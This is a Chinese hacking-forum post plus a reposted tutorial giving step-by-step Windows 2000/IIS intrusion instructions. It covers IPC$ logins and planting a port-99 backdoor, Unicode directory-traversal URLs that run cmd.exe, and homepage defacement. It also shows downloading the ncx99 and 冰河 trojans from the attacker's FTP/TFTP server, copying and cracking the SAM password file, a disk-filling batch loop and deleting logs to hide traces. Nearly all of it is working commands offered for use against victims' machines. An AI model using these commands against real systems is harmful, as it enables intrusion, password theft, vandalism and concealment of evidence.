- 主题
- 0
- 积分
- 0
- 贝壳
- 0 个
- 注册时间
- 2007-1-8
- 最后登录
- 2007-1-8
|
2000入侵小结 (1)
2000入侵小结 (1)
作者:痞菜
早就答应ekin 和jesse 写些原创的东西呵呵 我个菜鸟能写什么呢?经过wowo和蚂蚁的指教,我想还是把这些刚学来的,趁热就卖了吧:)
win2000的漏洞我知道的也就这几个在这献丑了
先什么呢?????就ipc$吧毕竟这个好理解 什么是ipc$ 我就不说了,我也不大明白
ipc探测大多基于139 用的工具当然是流光了呵呵其实还有别的工具也可以探测,我个人认为还是流光好.怎么用流光的ipc探测帮助里写的相当相当详细了
流光的帮助是我见过黑客教学最傻瓜的了大家 知道探测出密码了,可以用种植者
种植但是有时启动不起来那还要我们来帮助它吧 呵呵net use \\**.**.***.***\ipc$ "密码" /user:"这个你自己猜吧"
*** 是目标的位置就是ip 好象这是废话 呵呵
copy \tools\srv.exe \\202.**.**.**\admin$\system32 这个就是把srv.exe 复制到 肉鸡上
net time \\203.161>**.** 这个就是查看肉鸡的时间
比如说是 02:22 这个有可能是 02:22 还有可能是 14:22
at \\203.**.**.** 9:02 srv.exe 这样就启动了 srv.exe了
然后就telnet 203.**.**.** 99 (srn.exe 其实就是在99端口开启个后门 呵呵)
上去了吧 哈哈 对了上去也不代表我就控制了机器呀 对呀 你还要成为管理员 这样就方便多了呵呵
命令是 net user 用户 /add 这个是创建个用户
net localgroup administrators 用户 /add 这呀就是把刚才你加的用户加到管理员权限里
好了现在你是管理员了 呵呵 2000的一个很有用的就是做跳板
netsvc \\127.0.0.1 telnet /stop
netsvc \\127.0.0.1 telnet /start
这两个命令最好还是在肉鸡上执行
好象快点
好了ipc就介绍到这吧 其实net命令很有用的强烈推荐大家 好好看看命令详解
下面呢????好就cgi吧 哈哈这个好象难了点 我看见不少人都问怎么用好我就给大家介绍介绍 我其实也不怎么熟的 呵呵这是 我转来得大家 好好看看 我也懒
一、Unicode漏洞的实现
要利用unicode利用,先要知道如何实现,通常,我们通过以下几种途径来利用Unicode漏洞:
--http://www.exsample.com/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://www.exsample.com/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://www.exsample.com/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://www.exsample.com/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://www.exsample.com/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
如果浏览器返回C:的目录列表,那么就可以继续了。其中,从dir开始是真正的命令,用+连接命令。(注:下面将不再把前面的地址写上,直接为命令)
二、如何修改对方主页?
通常,在系统盘的目录下有Inetpub目录.其中有个wwwroot目录是用来存放主页空间的。
先dir+C:\Inetpub\wwwroot\察看目录:
返回:
======================================================
Directory of C:\inetpub\wwwroot
2001-01-31 22:56 .
2001-01-31 22:56 ..
1999-06-03 23:13 342 help.gif
1999-12-16 16:44 1,628 iisstart.asp
2001-01-31 22:56 images
1999-12-16 16:44 6,566 default.asp <====这个应该是主页,或者是index.asp
11 File(s) 23,885 bytes
5 Dir(s) 126,048,256 bytes free
=========================================================
接着:我们就
del+c:\inetpub\wwwroot\default.asp
echo+Hacked%20By%20Hacker%20>+c:\inetpub\wwwroot\default.asp
利用echo命令和重定向符号创建新文件.
三、如果主页不在默认路径下,如何知道在哪里?
我们可以到他的主页上,选取他的标题图片,右键点击,看它的文件名。比如:exsample.gif
于是,我们用:
dir+c:\exsample.gif/s
dir+d:\exsmaple.gif/s
...
这样可以搜索到它的标题图片,通常在主页的images目录下,那么这个目录的上级目录就是存放主页的。
按照二中所讲的方法可以修改其主页。
四、如何将文件上传?
这个是我们最关心的了,因为一旦上传了如ncx99一样的程序,那么有些事就好办多了。偷懒的人也许上传个冰河上去:)。
方法:(俗称ftp方法)
1.首先,申请个ftp账号(可以用ftp的主页账号也可),不要填真实身份哦!
2.将你要上传的文件上传到该ftp服务器上。
3.然后,在unicode漏洞的机器上,建立文件,用echo命令:
echo+open ftp.xxx.com(ftp主机) > c:\temp.1 (可以随便取个名字,最好放到隐蔽的地方)
echo+user yourname >> c:\temp.1 yourname是你的用户名
echo+yourpasswd >> c:\temp.1 yourpasswd是你的密码
echo+get ncx99.exe >> c:\temp.1 你要下载的文件
echo+quit >> c:\temp.1
4.执行ftp,用参数s
ftp+/s:c:\temp.1
好了,过一会儿,用dir察看当前目录,就会看见ncx99.exe,酷!接下来如何,不用说了吧!
五、如何做个很大的文件?
我们可以用bat文件来实现。用echo建立如下文件,注意扩展名为bat:
@echo off
echo big > x.x
:w
copy x.x+x.x x.x
goto w
这样,就会……呵呵,不用说了吧,但这个好像不好。也可以上传个程序过去。这个只不过比较方便。
六、万一遇到长文件名怎么办?
这是很菜鸟的问题,但确实有人不会用,我在这里简单地说一下:
例如:
c:\program files\microsoft billgates\hackermanandwoman.txt
如何表示?用:
c:\"program20%files"\"microsoft20%billgates"\hackermanandwoman.txt
七、如何删除脚印(日志)?
用如下命令:
del+C:\winnt\system32\logfiles\*.*
del+C:\winnt\ssytem32\config\*.evt
del+C:\winnt\system32\dtclog\*.*
del+C:\winnt\system32\*.log
del+C:\winnt\system32\*.txt
del+C:\winnt\*.txt
del+C:\winnt\*.log
八、如何创建新的用户名,并将用户名加入Administrator组?这个不一定会成功,由于你没有足够的权限。除非碰到一些傻瓜网站。
我们可以用echo创建一个bat文件。包含一下命令:
net user Myname MyPasswd /add /expires:never
net localgroup "administrators" /add Myname
然后,执行这个bat,就可以了。记得把它删除哦!
九、如何获得SAM数据库?
先用上传文件的方法上传samdump,然后用它把sam库拷贝到别的地方(直接下载SAM库是不行的)。
比如samdump C:\winnt\system32\config\sam C:\temp.aaa
然后在把temp.aaa上传到你的ftp服务器上,也可以把它拷贝到主页目录下,用浏览器下载。
本篇文章允许转载,但请注明由eastdark所著
呵呵 上面说的 其实很简单的
http://*****.***>***/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
这个就是最经典的unicode漏洞了 最主要是能用命令呵呵 /winnt/system32/cmd.exe?/c+这个后面就是用命令的地方 比如要看system32 文件夹的内容 就是 /winnt/system32/cmd.exe?/c+dir+c:\winnt\system32
还有别的命令 呵呵
../winnt/system32/cmd.exe?/c+copy+c:\winnt\repair\sam._+c:\inetpub\wwwroot\
这个就是把 sam复制到wwwoot 呵呵到了那你知道要干什么了吧 当然了下载后破解密码呀 哈哈 对了破解密码的时间可不短呀 呵呵 不管是什么漏洞都是为了得到管理员权限 我们既然把srv.exe复制到肉鸡上了当然是启动他了 用 ftp你可以自己社定地址 比如你把srv.exe复制到C:\Inetpub\scripts\里了 启动它就是 winnt/system32/cmd.exe?/c+C:\Inetpub\scripts\srv.exe
既然启动你还塄着干什么 telnet 呀 呵呵 还是 99 端口呀
我再给大家介绍一篇
最近这些日子好多的WINNT的服务器被黑,尤其是国内的。下面是一些具体示例的总结。
下面这类型的漏洞以发现近一年多了,一年多前在国外的黑客网站就有了类似的文章,但是当时
并没有很多人重视。,在反北约的黑客战中有很多就是用下面这些例子了。
不过直到UNICOUDE漏洞的发现,黑NT的计算机变的傻瓜化了。下面我把最近的一些文章总结一下。
希望大家能从这里体会到点什么。(下面的文章来自一些邮件列表和BBS)
原理:(其实原来都很相似,我拿这个做个例子。)
NSFOCUS安全小组发现IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,
导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode
字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执
行某些web根目录以外的文件。
对于IIS 5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如"%c1%hh"
或者"%c0%hh",它会首先将其解码变成:0xc10xhh, 然后尝试打开这个文件,Windows 系统
认为0xc10xhh可能是unicode编码,因此它会首先将其解码,如果 0x00<= %hh < 0x40的话,
采用的 解码的格式与下面的格式类似:
%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh
因此,利用这种编码,我们可以构造很多字符,例如:
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。
(1) 如果系统包含某个可执行目录,就可能执行任意系统命令。下面的URL可能
列出当前目录的内容:
http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
(2) 利用这个漏洞查看系统文件内容也是可能的:
http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
Rain Forest Puppy 测试发现对于英文版的IIS 4.0/5.0,此问题同样
存在,只是编码格式略有不同,变成"%c0%af"或者"%c1%9c".
下面我们的例子以%c1%1c为主讲解。
注:+号可以用%20代替,依这种格式你还可以构造出许多命令
好多站点\inetpub\下的scripts目录删除了,
但\Program Files\Common Files\System\下
的msadc还在(有msadcs.dll漏洞的话就不用
%c1%1c了)。这时可以如下构造请求:
http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
实践一:(修改主页----最简单化的一种)
很多入侵都以修改主页的形式表现出来,这通常有两种情况:一是表达自己的
愤慨——比如当年以美国为首的北约悍然轰炸我驻南使馆的突发事件之后,国内很多黑客
在ICQ、BBS一呼百应,纷纷对敌国进行各种形式的攻击,当然以替换主页最为大快人心!
二是在给网管发e-mail漏洞报告之后没反应,有的黑客按耐不住,就用修改主页的方式给予警告,
用以引起人们对于安全技术的重视。当然说起来这是违法的啦,所以大家要注意哦,不要光图一时的痛快,
呵呵!
可以使用ECHO命令、管道符等建立文件,修改文件内容。但因为IIS加载程序检测到有CMD.EXE或者COMMAND.COM串就要检测特殊字符“&|(,;%<>”,如果发现有这些字符就会返回500错误,所以不能直接使用CMD.EEX加管道符等。因此可以采用拷贝CMD.EXE换名的方法绕过去。
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\ccc.exe
然后
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+Hacked+by+chinese+>+f:\wwwroot\xxx\default.asp
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+1/1/2001+>>+f:\wwwroot\xxx\default.asp
就改了主页了!
这种方法对于有负载均衡的主机很不方便,又需要几次才能完成,所以不好。袁哥给出了另一种更方便的办法。参考袁哥(yuange)的帖子《IIS不用拷贝CMD.EXE使用管道符等的方法》,可以这样:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+Hacked+by+hacker+>+f:\wwwroot\xxx\default.asp
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+12/1/2k+>>+f:\wwwroot\xxx\default.asp
这样,主页就被更改成了:
Hacked by hacker
12/1/2k
当然我是没有这样做啦,不过这些东西我都在自己配置的环境下实现了,
在我练习的过程中发现,用ECHO写这些的时候很慢,如果你多次回车,过一阵屏幕刷新后主页上就会留下多个
你要写的内容。
实践二(下载SAM文件)
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32
/cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件,
执行:
http://xxx.xxx.xxx.xxx/scripts/..á../winnt/system32/cmd.exe?/c
+copy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制,
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除,哇!太利害了。
随便浏览了一下,因为是国内的主机,不想搞破坏,只想练练手!目的:
获得Administrator权限。
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\
把sam._文件拷贝到wwwroot文件内,输入:http://xxx.xxx.xxx.xxx/sam._
将sam._文件下载到本地,执行:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c
+del%20c:\inetpub\wwwroot\sam._清除痕迹。
在本机执行:C:>expand sam._ sam
启动l0phtcrack 2.5(可到http://rina.yofor.com/7index.html 下载),Import Sam File... 导入sam文件,Open Wordlist File...
打开一个字典,Run Crack,乖乖,要17个小时,不管它,让它慢慢破去,先睡个
觉先!五分钟后来一看,Administrator 的 Nt Password 居然是 123456,我昏,
网管们注意了,这种密码也可以取呀?执行:C:\>newletmein \\xxx.xxx.xxx -admin
扫描主机,发现管理员ID是:asdfghjk,执行:C:\>net use \\xxx.xxx.xxx.xxxc$
123456 /user:asdfghjk 成功联上对方主机,大功告成!窜到存放日志的目录:
winnt\system32\logfiles 看了看,呵呵!
实践三(用木马)
如果你对net use的使用不熟悉的话,可以找找相关的资料来看,net命令也是基本技能啊,好好掌握吧)
在本地设定一个共享目录,比如f:\123,把ncx99.exe和冰河服务端放在里面,同时为了试验,
放了一个0字节的1.txt;然后再tftp98中把目录指向f:\123,现在就要让对方运行tftp.exe来下载文件啦!
http://xxx.xxx.xxx.xxx/scripts/cmd.exe?/c+copy+c:\winnt\system32\tftp.exe%20f:\wwwroot\scripts
然后
http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i+111.111.111.111+get+1.txt+cosys.txt
(111.111.111.111表示我们的ip,或者是我们的tftp服务器ip)
看,返回下面的内容:
CGI 錯誤
所指定的 CGI 應用程式處理有誤,它未傳回完整的 HTTP 標題。所傳回的標題是:
Transfer successful: 0 bytes in 2 seconds, 0 bytes/s
这就成功啦!看看:
http://xxx.xxx.xxx.xxx/scripts/sys.exe?/c+dir+1.txt
果然有的,哈,继续:
http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i+111.111.111.111+get+ncx99.exe+scripts.exe
现在继续把冰河弄上去,国货精品,也让同胞们看看嘛!这是最方便的啦,哈哈!
http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i+111.111.111.111+get+G_Client.exe+c:\winnt\system32\iinter.exe
返回:
CGI 錯誤
所指定的 CGI 應用程式處理有誤,它未傳回完整的 HTTP 標題。所傳回的標題是:
Transfer successful: 266240 bytes in 271 seconds, 982 bytes/s
成功啦,这样,我们就可以先让它中木马啦!
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/inter.exe
之后,用客户端连接过去,找到自己需要的东西,什么?你不知道你需要什么?
那你进去干什么?!学习啊?好啊,学到什么啦?总结一下,把纪录删掉(或者改写?覆盖?你自己想吧)
|
|